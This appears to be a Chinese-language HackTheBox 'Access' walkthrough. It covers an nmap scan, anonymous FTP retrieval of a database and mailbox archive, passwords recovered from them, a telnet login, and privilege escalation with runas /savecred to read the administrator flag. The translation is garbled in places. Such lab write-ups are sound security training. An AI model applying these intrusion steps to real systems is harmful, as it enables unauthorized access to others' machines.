首先,我要说这台机器花了我大约6小时来完成整个工作。我掉了几个万恶的坑里,最终的解决方案比我想象的要简单得多。
我的第一步。在新计算机上启动时,几乎总是这样,即执行nmap扫描以查看运行情况。
root@localhost:~/hackthebox/access# nmap -p- -sV -O 10.10.10.98
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 06:02 EST
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.02% done
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 16.93% done; ETC: 06:07 (0:04:30 remaining)
Nmap scan report for 10.10.10.98
Host is up (0.13s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (89%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (89%), Microsoft Windows Phone 7.5 or 8.0 (89%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 683.84 seconds
从输出中我们可以看到有3个服务。Telnet,HTTP和FTP。首先检查HTTP是最简单的方法。所以我浏览到http://10.10.10.98,在其中显示了一个页面,其中包含称为out.jpg的图像,该图像显示了服务器机房的摄像机视图,在上方显示了文本LON-MC6。查看源时,页面上没有任何隐藏的内容。
<html>
<head>
<title>MegaCorptitle>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
head>
<body>
<div align="center">
<p><strong><font size="5" face="Verdana, Arial, Helvetica, sans-serif">LON-MC6font>strong> p>
<p><img border="0" src="out.jpg">p>
div>
body>
html>
因为,这似乎暂时还没有到位。接下来,我决定尝试通过使用ncftp进行连接以检查FTP服务:
root@localhost:~# ncftp 10.10.10.98
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Copyright (c) 1992-2011 by Mike Gleason.
All rights reserved.
Connecting to 10.10.10.98...
Microsoft FTP Service
Logging in...
User logged in.
Logged in to 10.10.10.98.
ncftp / > dir
connect failed: Connection refused.
connect failed: Connection refused.
connect failed: Connection refused.
Falling back to PORT instead of PASV mode.
List failed.
ncftp / > dir
d--------- 1 ftpuser ftpusers 0 Aug 23 2018 Backups
d--------- 1 ftpuser ftpusers 0 Aug 24 2018 Engineer
ncftp / > cd Backups
ncftp /Backups > dir
---------- 1 ftpuser ftpusers 5652480 Aug 23 2018 backup.mdb
ncftp /Backups > get backup.mdb
backup.mdb: 5.39 MB 76.00 kB/s
ncftp /Backups > cd ..
ncftp / > cd Engineer
ncftp /Engineer > dir
---------- 1 ftpuser ftpusers 10870 Aug 24 2018 Access Control.zip
ncftp /Engineer > get "Access Control.zip"
Access Control.zip: 10.62 kB 3.66 kB/s
ncftp /Engineer >
FTP服务接受来宾登录,因为它不提示输入密码。它包含两个称为“ Backups and Engineer”的目录,在“ Backups”中具有一个backup.mdb文件,在Engineer我最初尝试使用标准ftp命令而不是ncftp来执行此操作。但是由于某种原因,它不会正确下载备份。 mdb并损坏。因此,出于这个原因,我改用了ncftp,效果很好。然后,我厌倦了解压缩“ Access Control.zip”,但是它受到密码保护。
root@localhost:~# 7z e Access\ Control.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Xeon(R) CPU L5520 @ 2.27GHz (106A4),ASM)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
Enter password (will not be echoed):
ERROR: Wrong password : Access Control.pst
Sub items Errors: 1
Archives with Errors: 1
Sub items Errors: 1
root@localhost:~#
然后,我将backup.mdb复制到我的Windows计算机上,并使用一些名为MDB Viewer的免费软件打开了该文件。该文件包含许多我搜索过的表。看上去很重要的一个表称为auth_user,其中包含3个用户/密码组合。我对“ Access Control.zip”上的每个密码都感到疲倦,密码access4u @ security可以解压缩并提取其中的PST文件。
PST文件是交换邮箱的存储文件。我将PST文件导入到Thunderbird中,这使我可以查看文件中包含的电子邮件。
From "[email protected]" Thu Aug 23 23:44:07 2018
Status: RO
From: [email protected]
Subject: MegaCorp Access Control System "security" account
To: '[email protected]'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--boundary-LibPST-iamunique-1048588502_-_-"
----boundary-LibPST-iamunique-1048588502_-_-
Content-Type: multipart/alternative;
boundary="alt---boundary-LibPST-iamunique-1048588502_-_-"
--alt---boundary-LibPST-iamunique-1048588502_-_-
Content-Type: text/plain; charset="utf-8"
Hi there,
The password for the "security" account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
我的下一步是通过使用电子邮件中提供的附加进行连接,检查nmap找到的最终Telnet服务。
ec2-user@kali:~/Documents/access$ telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
一个用户标志存储在c:\ Users \ security \ Desktop \ user.txt中,一个根标志存储在c:\ Users \ security \ Desktop \ user.txt中。因此,我将其CD到桌面,将user.txt的内容输出到命令行。
C:\Users\security>cd Desktop
C:\Users\security\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 9C45-DBF0
Directory of C:\Users\security\Desktop
08/28/2018 06:51 AM .
08/28/2018 06:51 AM ..
08/21/2018 10:37 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 16,768,454,656 bytes free
C:\Users\security\Desktop>type user.txt
{
{
REDACTED}}
C:\Users\security\Desktop>
因此,我们现在已经成功获取了用户标志。下一步是获取根标志。这是我花了最多的时间实现的目标。我花了很长时间尝试尝试上载并运行Shell并使用ZKAccess3.5程序执行权限升级,但是这些允许成功。最后一个功能的方法是使用runas命令。这允许您以其他用户的身份从命令行运行某些内容。因此,我本质上想做的就是运行命令“键入c:\ Users \ Administrator \桌面\ root.txt”。作为管理员。我最初尝试立即运行“ runas /用户:管理员”类型c:\用户\管理员\桌面\ root.txt。此问题是Runas产生了第二个窗口来运行命令并输出结果。所以您不会在窗口中看到输出。
C:\Users\security>runas /user:administrator "type c:\Users\Administrator\Desktop\root.txt""
Enter the password for administrator:
我尝试输入在backup.mdb中找到的其他密码,但是没有一个动作。我发现的是runas命令的一个选项,它允许您为用户使用保存的替代。因此,如果管理员帐户的替换保存在Windows可以使用管理员身份运行命令,而无需手动输入密码。这是通过使用/ savecred开关完成的。我发现再次使用了它,本来应该是root.txt的内容(root标志)的输出也是空白的。这是由于该命令在telnet会话之外的另一个视图中运行。经过大量的猜测和操作后,我发现以下命令启动了,从而允许我运行所需的命令变为结果输出到txt文件中,可以在当前会话中查看该文件。
C:\Users\security>runas /savecred /user:administrator "cmd /k type c:\Users\Administrator\Desktop\root.txt > c:\Users\security\bbdd.txt"
C:\Users\security>type bbdd.txt
{
{
REDACTED}}
如您所见,此操作成功完成,我能够以管理员身份执行命令并读取root.txt的内容。
关注:Hunter网络安全 获取更多资讯
网站:bbs.kylzrv.com
CTF团队:Hunter网络安全
文章:Xtrato
排版:Hunter-匿名者